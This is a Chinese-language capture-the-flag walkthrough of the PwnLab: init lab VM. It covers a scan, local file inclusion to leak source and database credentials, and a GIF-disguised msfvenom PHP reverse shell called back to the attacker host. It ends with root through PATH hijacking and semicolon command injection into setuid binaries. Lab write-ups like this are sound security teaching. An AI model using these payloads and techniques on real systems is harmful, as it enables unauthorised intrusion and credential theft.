关于
信息收集
nmap -sn 192.168.7.1/24
Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-10 12:55 CST
Nmap scan report for 192.168.7.1
Host is up (0.00071s latency).
Nmap scan report for 192.168.7.130
Host is up (0.00060s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.39 seconds
Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-10 12:55 CST
Nmap scan report for 192.168.7.130
Host is up (0.00098s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 44040/tcp status
|_ 100024 1 51756/udp status
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
| mysql-info:
| Protocol: 53
| Version: .5.47-0+deb8u1
| Thread ID: 84
| Capabilities flags: 63487
| Some Capabilities: SupportsTransactions, Support41Auth, DontAllowDatabaseTableColumn, ConnectWithDatabase, Speaks41ProtocolOld, SupportsLoadDataLocal, FoundRows, SupportsCompression, LongColumnFlag, Speaks41ProtocolNew, InteractiveClient, IgnoreSpaceBeforeParenthesis, LongPassword, IgnoreSigpipes, ODBCClient
| Status: Autocommit
|_ Salt: "]0w'Xi((0XLS:j'"r<q
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.04 seconds
- 开了80和3306端口,系统Debian,打开Web看看
- 发现URL有一个规律,可能page后面跟着是一个文件名,但是没有后缀名
<?php if(isset($_GET['page'])){
include($_GET['page'].".php")
?>
我们猜测index的代码像上面的功能一样。
http://192.168.7.130/?page=login
http://192.168.7.130/?page=upload
- 可能存在
LFI(local file inclusion)漏洞 - 构造URL
http://192.168.7.130/?page=php://filter/convert.base64-encode/resource=login - 发现可以包含读到文件,然后base64解密
---login.php---
<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);
if (isset($_POST['user']) and isset($_POST['pass']))
{
$luser = $_POST['user'];
$lpass = base64_encode($_POST['pass']);
$stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
$stmt->bind_param('ss', $luser, $lpass);
$stmt->execute();
$stmt->store_Result();
if ($stmt->num_rows == 1)
{
$_SESSION['user'] = $luser;
header('Location: ?page=upload');
}
else
{
echo "Login failed.";
}
}
else
{
?>
<form action="" method="POST">
<label>Username: </label><input id="user" type="test" name="user"><br />
<label>Password: </label><input id="pass" type="password" name="pass"><br />
<input type="submit" name="submit" value="Login">
</form>
<?php
}
- 跟着再把
require中的config读出来
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>%
- 顺便也把index和upload的也读了
---index---
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>%
---upload---
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
if ($_FILES['file']['error'] <= 0) {
$filename = $_FILES['file']['name'];
$filetype = $_FILES['file']['type'];
$uploaddir = 'upload/';
$file_ext = strrchr($filename, '.');
$imageinfo = getimagesize($_FILES['file']['tmp_name']);
$whitelist = array(".jpg",".jpeg",".gif",".png");
if (!(in_array($file_ext, $whitelist))) {
die('Not allowed extension, please upload images only.');
}
if(strpos($filetype,'image') === false) {
die('Error 001');
}
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
die('Error 002');
}
if(substr_count($filetype, '/')>1){
die('Error 003');
}
$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "<img src="".$uploadfile.""><br />";
} else {
die('Error 4');
}
}
}
?>%
- 在上面已经拿到了MySQL的账号密码了,而且在用nmap扫的时候已经发现3306端口是开放的。
mysql -h 192.168.7.130 -u root -D Users -p密码是config文件的那个,自行解密。
mysql> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users |
+-----------------+
1 row in set (0.00 sec)
mysql> select * from users;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |---JWzXuBJJNy
| mike | U0lmZHNURW42SQ== |---SIfdsTEn6I
| kane | aVN2NVltMkdSbw== |---iSv5Ym2GRo
+------+------------------+
3 rows in set (0.01 sec)
- 登录上传文件试试,上面的源码已经知道只能上传图片后缀的文件,而且还判了文件类型和mime
绕过上传
- 方法1:在木马上加图片标志绕过
echo GIF89a > kali.gifmsfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.7.1 LPORT=7788 R >>kali.gif
- 方法2:上BurpSuite,你们比我熟练。
- 上传之后会返回一个相对路径就是文件的md5
upload/51c65dd716e81189745d6eb1c9f1bb6b.gif - 直接打开是不会解析的,但是index文件那还有一个文件包含,文件路径可以通过cookie传进去
curl --cookie "lang=../../../../../../etc/passwd" "http://192.168.7.130"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash
mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
Use this server to upload and share image files inside the intranet</center>
</body>
</html>%
- 发现可以,把
../../../../etc/passwd换刚刚上传的木马路径 curl --cookie "lang=../upload/51c65dd716e81189745d6eb1c9f1bb6b.gif" "http://192.168.7.130"- 发现meterpreter那边已经获取到回话了。
[*] Started reverse TCP handler on 192.168.7.1:7788
[*] Meterpreter session 1 opened (192.168.7.1:7788 -> 192.168.7.130:55888) at 2018-07-10 14:19:16 +0800
meterpreter >
提权
- 还是以前的套路
python -c 'import pty;pty.spawn("/bin/bash")'拿数据库的密码去登录各个用户 - 发现kane的密码可以登录,在他的home目录找到了一个属于mike用户的ELF可执行文件
kane@pwnlab:~$ file msgmike
file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped
kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory
- 执行报没有mike用户目录下的文件,把他下载回来,先用Python中的
python -m SimpleHTTPServer搭建一个简单的http服务。浏览器打开192.168.7.130:8000
python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.7.1 - - [10/Jul/2018 02:39:26] "GET / HTTP/1.1" 200 -
192.168.7.1 - - [10/Jul/2018 02:39:26] code 404, message File not found
192.168.7.1 - - [10/Jul/2018 02:39:26] "GET /favicon.ico HTTP/1.1" 404 -
192.168.7.1 - - [10/Jul/2018 02:39:28] "GET /msgmike HTTP/1.1" 200 -
-
简单拖进IDA看看
cat /home/mike/msg.txt它使用了带参数的系统函数,我们把环境变量改为当前目录。 -
可以修改PATH变量,从而将这个“cat”转换为shell:
kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory
kane@pwnlab:~$ echo "/bin/bash" > cat
echo "/bin/bash" > cat
kane@pwnlab:~$ ls
ls
cat msgmike
kane@pwnlab:~$ chmod 777 cat
chmod 777 cat
kane@pwnlab:~$ export PATH=/home/kane
export PATH=/home/kane
kane@pwnlab:~$ ./msgmike
./msgmike
bash: dircolors: command not found
bash: ls: command not found
mike@pwnlab:~$
- 现在用户变成Mike了,再把PATH改回来
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin就可以了。现在到Mike的home目录发现有一个文件msg2root继续拖进IDA发现"/bin/echo %s >> /root/messages.txt" - 这是把用户传进的字符串打印出来,但如果字符串里有分隔符的话就可能跟着执行了下一个命令。而且是root权限。
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: id ; whoami
id ; whoami
id
root
mike@pwnlab:/home/mike$
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: asdasdasdas;/bin/sh
asdasdasdas;/bin/sh
asdasdasdas
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
cd /root
ls
flag.txt messages.txt
cat flag.txt
.-=~=-. .-=~=-.
(__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _)
(_ ___) _____ _ (_ ___)
(__ _) / __ | | (__ _)
( _ __) | / / ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __)
(__ _) | | / _ | '_ / _` | '__/ _` | __/ __| (__ _)
(_ ___) | \__/ (_) | | | | (_| | | | (_| | |_\__ (_ ___)
(__ _) \____/\___/|_| |_|\__, |_| \__,_|\__|___/ (__ _)
( _ __) __/ | ( _ __)
(__ _) |___/ (__ _)
(__ _) (__ _)
(_ ___) If you are reading this, means that you have break 'init' (_ ___)
( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __)
(__ _) this challenge. (__ _)
(_ ___) (_ ___)
( _ __) Please send me your feedback or your writeup, I will love ( _ __)
(__ _) reading it (__ _)
(__ _) (__ _)
(__ _) For sniferl4bs.com (__ _)
( _ __) claor@PwnLab.net - @Chronicoder ( _ __)
(__ _) (__ _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-' `-._.-'
#